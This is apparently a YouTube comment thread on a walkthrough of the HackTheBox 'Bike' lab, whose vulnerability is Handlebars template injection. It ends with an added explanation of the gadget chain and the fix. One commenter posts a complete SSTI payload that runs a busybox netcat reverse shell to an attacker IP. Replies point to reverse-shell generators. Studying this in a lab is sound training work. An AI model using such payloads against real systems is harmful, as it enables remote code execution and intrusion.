For a box rated "very easy" this is actually quite difficult. They really should emphasize that these learning paths should be done with the walkthrough.
You're right, what's "easy" and "hard" is always relative to each person's knowledge and experience. It can be hard for experts (like those at HTB) to remember how difficult concepts were when they first covered them 😄 At the same time, you learn a lot during the struggle (but don't be afraid to refer to walkthroughs or ask for help).
At first I felt really guilty having to look some of this stuff up but you do a great job of explaining everything and I'm learning a ton! Thanks so much!
thanks mate 🥰 don't feel guilty! i always recommend spending some time on challenges/boxes before looking up walkthroughs but at some stage it becomes counterproductive, gotta find the right balance 😉
Thank you so much for making this! the pdf walkthrough on HTB had me messed up on the last step and I couldn't figure it out for the life of me. Using their guide I got stuck trying to get it to print that I was in the root directory. Watching you go through the documentation and then alter the code to run whoami and then get the flag helped me so much, I just wasn't getting it before this video. Thank you, subbed
🙏🥰
thank you so much! this entire thing is insanely confusing but you definitely helped me understand at least some of it
Glad it helped! 🥰
It's very beneficial to learn programming, this wasn't the easiest one.
Definitely, programming is a key skill for anyone interested in security 💯💯💯
Great video, thanks! As a noob, I was a bit overwhelmed by searching throughout all the Node.js documentation and this video really helped to narrow down the search. I am aware that diving in documentation is part and parcel of this, but it saved me some valuable time that I didn't have lately.
Thank you!
Awesome, TY! I thought that was quite a difficult (and time consuming) step for most people doing starting point, I can see many getting stuck there xD
Unreal. I had a hard time with burpsuite but got there in the end
Awesome! Nice work 👊
So did I
Thank you man, you are my hero. Most noobs like me are just having issues finding the global to use; you really help a lot.
🙏🥰
"very easy" they said, it will be fun they said :(
d'awww *hugs*
Yea this box wasn't very easy at all😅😂
Man, just wanted to say thanks, I had gotten all the way to the last step myself and was totally unsure how to finish it off after many an attempt and a bit of head scratching. I watched the whole video anyway as I thought I might learn something else (it's only 20 mins versus about an hour of last step head scratching lol).
So thanks a lot. Got yourself a subscriber.
thanks mate 🙏🥰
@@_CryptoCat no thank you!
I'm just starting out the last two or three months on Ethical Hacking, learned a lot but quite often even the simplest things still stump me! So for HTB especially, you're going to have an avid viewer for when I'm totally lost. Because one thing I've begun to learn is, it's crazy how even the simplest and most obvious of solutions and methods elude you when you simply don't know.
Keep up the great work and much appreciation for sharing your knowledge.
@@kylejf9059 Exactly right mate! Building up a methodology takes time and a lot of pen-testing/CTF is "oh, I saw/did something like this before, best check x,y,z". Best of luck on your journey! 😉
this vid helped me a LOT! I'm just starting out and my issue is thinking outside the box, I'm struggling to think how a veteran would and questioning the security of everything as I only have very limited knowledge.
I hope it clicks soon :/
Thanks again
Thanks for the video! The HTB documentation made it out like they wanted you to use the encoded text in Repeater. I finally discovered through your video that I needed to put the unencoded text there instead.
Well, I guess I should thank HTB for providing incorrect information, leading people to find my videos 😂
You are so educational with all this. Great explanations the entire time! I was getting irritated that I couldn't figure out Burp and the walkthrough HTB had didn't help all that much. You helped so much I will be using you as a resource to help me when I get stuck. Been stuck on this box for two days now lol
awww thanks mate! glad it could help 🥰
FYI: Burp Suite is pre-configured to use its own browser in Kali Linux. If your project does not work, try re-configuring Burp to work with external browsers like I had to do.
Thank you so much for these videos. You have helped me so much already on this journey.
love to hear it! thanks mate 🙏🥰
Thanks for your efforts ... great help
I was stuck on the template part yesterday and no matter what I've sent I had 400 response so I started to look for more info.
Funnily enough today everything worked fine, I wonder if my machine was spawned incorrectly the day before :D
I do agree with you, this one seems harder than "very easy" tier... Now I understand this better. Very happy I stumbled across your channel, I will be checking more videos for sure. Separate thanks for the burp suite filtering advice
🙏🥰
CryptoCat to the rescue :D Thanks for this. I spent ages digging through the Node.js docs, completely lost as to what I was looking for, it was time for some help. Besides hours of trial and error, I'm still not sure how to make that connection to the correct module in the docs, I suppose that's the nature of pen testing. This has been a really difficult one. Lots to learn! Again many thanks :)
No problem at all 💜
THANK YOU
Great video as always ..... waiting for the next video in the pwn series :)
Awww thanks 🥰 New pwn video tomorrow (injecting shellcode) 😉
@@_CryptoCat Awesome !!
I can't believe this is "starting point". I get that we need to learn but sometimes we would be LOST without people like you!
Thank you & bad HTB! :P
😂👌
No way this was starting point. I felt this box just assumes that everyone is a seasoned web dev.
This box is labeled "Very easy" yet I was not able to finish it even though I finished a Hard box before. Even after following a walkthrough, I'm getting a "SyntaxError: Invalid or unexpected token" error.
They should immediately remove the entire box.
Great videoo!!
Thanks!
🥰
This a great video... thanks a bunch...
Thank you! ☺
Great Video! 💙
thanks mate 💜
Excellent explanation!!! Subscribed!
Thank you! 💜
Never used Burp Suite before so I learned the whole course at HTB Academy, only to find out that I still don't know how to do this lab LOL
😂
Cool video, thanks a lot.
I am a noob and just learning, sometimes I want to understand how a specialist should think when solving such problems. And your videos help a lot. The scope of knowledge is striking.
Tell me you do not participate in CTF competitions?
thanks mate 🥰 I play CTFs as much as I can xD
Hardest box on Tier 1, took me a couple hours never found the flag got very close though. This is a very difficult box for being labeled "easy".
Yeh, difficulty ratings are very tricky. It's all relative, what's easy to someone with a few years experience might feel impossible to beginners, or those coming from a different field. You'll get there though, keep it up! 👊
Weird, because I'm an IT technician with a decent grasp of networking concepts and still find it extremely hard. Guess it just takes a lot of experience. @@_CryptoCat
Great Video. I do have one question though, how do I get firefox to not redirect me to its "problem loading page" when an error occurs, i.e. 4:29, I just get a default site from ff.
thanks! not sure about that one, it should just show the error page by default 😕
Great job, really helpful! :)
Thank you! 😊
I don't understand why but even though I entered the exact code into the decoder, it will not give me the 'root' output, only the objects. What am I doing incorrectly?
Ermmm really hard to say but most likely some small typo somewhere, it's the source of most of my problems anyway 😂
@@_CryptoCat Awesome thank you so much. I figured as much. Someone else said something similar to me today so I will revisit.
Hi, TLDR gives back error text, no entry for the above used things. Do I need to update/write my own things for it, or what?
This happens for me a lot as well, not every tool is covered and they accept user-supplied tldr-pages: github.com/tldr-pages/tldr, you can also create your own custom ones and AFAIK.
Can you let me know what specs you are giving to your Parrot VM?
Of course! imgur.com/a/vRjGQ4K
First of all, thanks to the hard work of the author of the video. I would like to ask a question, is it possible to get a shell for the final steps here? I checked the relevant information on the Internet, and tried to use bash and python to get a reverse shell, but none of them succeeded.
Thank you! I didn't try a reverse shell on this one, you could check a few variations from revshells.com but HTB might have blocked outbound connections.
what's the right payload for a reverse shell?
There are many different types of reverse shell, it will depend on the environment you're trying to connect to. Even if you find the right shell, there may be filters in place that you need to get around. Generally, I use revshells.com - first find the type of shell you are looking for (often netcat with HTB), then try different variations until one works 😉
Can you explain the SSTI script from HackTricks which has been used in this BIKE challenge?
Been a while since I did this machine, any specific part of the SSTI you are confused about?
@@_CryptoCat sorry to disturb you. I just can't understand the injection script which has been used. Could you explain it, or any sites where I could learn more about it?
Sure, here's a few articles:
portswigger.net/research/server-side-template-injection
book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
medium.com/@bdemir/a-pentesters-guide-to-server-side-template-injection-ssti-c5e3998eae68
And videos:
ua-cam.com/video/Ffeco5KB73I/v-deo.html
ua-cam.com/video/SN6EVIG4c-0/v-deo.html
ua-cam.com/video/7sdfT8Z_CPw/v-deo.html
Uhhh...i'm not...sure exactly how I was supposed to figure this out without a complete handhold lmao. I think this might be the worst one yet.
So first of all, great content!
I've managed to put a revshell busybox nc "ip-address" "port" -e sh in the execSync; it looks like this:
{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return process.mainModule.require('child_process').execSync('busybox nc 10.10.14.120 9001 -e sh');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}
But the shell is only up for a few seconds - can someone explain why?
Hmmmm not too sure on the details but you have a couple of options; you could launch a new shell from your first shell and connect to it on a different port OR try a more stable shell, I always use the "mkfifo" one which I remember 0xdf did an awesome breakdown of: ua-cam.com/video/_q_ZCy-hEqg/v-deo.html
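Added example (not from the thread, HTB or HackTricks): the plain-JavaScript primitives the Handlebars payload above relies on, so the template reads less like magic. Two steps do all the work: `(lookup string.sub "constructor")` walks from a string method to the global Function constructor, and `(string.sub.apply 0 codelist)` inside `{{#each conslist}}` applies that constructor to the attacker's source text, compiling a new function that Handlebars then calls when it renders `{{this}}`. The code below reproduces that chain with a harmless arithmetic body instead of child_process; it touches no template engine and no network.

```javascript
// Added example: the JavaScript gadget chain behind the Handlebars SSTI payload.
// Runs with plain Node; the only "payload" it evaluates is arithmetic.

// Step 1: every built-in string method is a Function object, so its `constructor`
// property is the global Function constructor. This is what
// `(lookup string.sub "constructor")` resolves to in the template.
function functionConstructorFromString(str) {
  return str.sub.constructor; // String.prototype.sub (legacy <sub> wrapper); any method works
}

// Step 2: Func.apply(anyThis, [sourceText]) is equivalent to Function(sourceText):
// it compiles a brand-new function from a string. In the template this is
// `(string.sub.apply 0 codelist)` evaluated while `this` is the Function object
// that was pushed into conslist, with codelist holding the source text.
function compileViaApply(Func, codelist) {
  return Func.apply(0, codelist);
}

// Step 3: Handlebars invokes a function value when rendering `{{this}}`; that call is
// the moment the injected code runs. Here we make the call ourselves.
// Functions built this way execute in global scope, where the CommonJS module-local
// `require` is not visible, which is why the real payload reaches child_process via
// `process.mainModule.require(...)` instead of a bare `require(...)`.
function runGadget(code) {
  const Func = functionConstructorFromString("s");   // {{#with "s" as |string|}}
  const compiled = compileViaApply(Func, [code]);     // codelist = [code]
  return compiled();                                  // {{this}}
}

// Harmless stand-in for "return process.mainModule.require('child_process').execSync(...)".
const demo = runGadget("return 6*7"); // 42
```

The defensive reading: the chain only exists because user input was compiled as a template (`Handlebars.compile(userInput)`). The fix is to compile a fixed template and pass the input as data (`Handlebars.compile("Hello {{name}}")({ name: userInput })`); Handlebars 4.6 and later also refuse access to prototype properties and methods of the context by default, which breaks the `string.sub.constructor` step on its own.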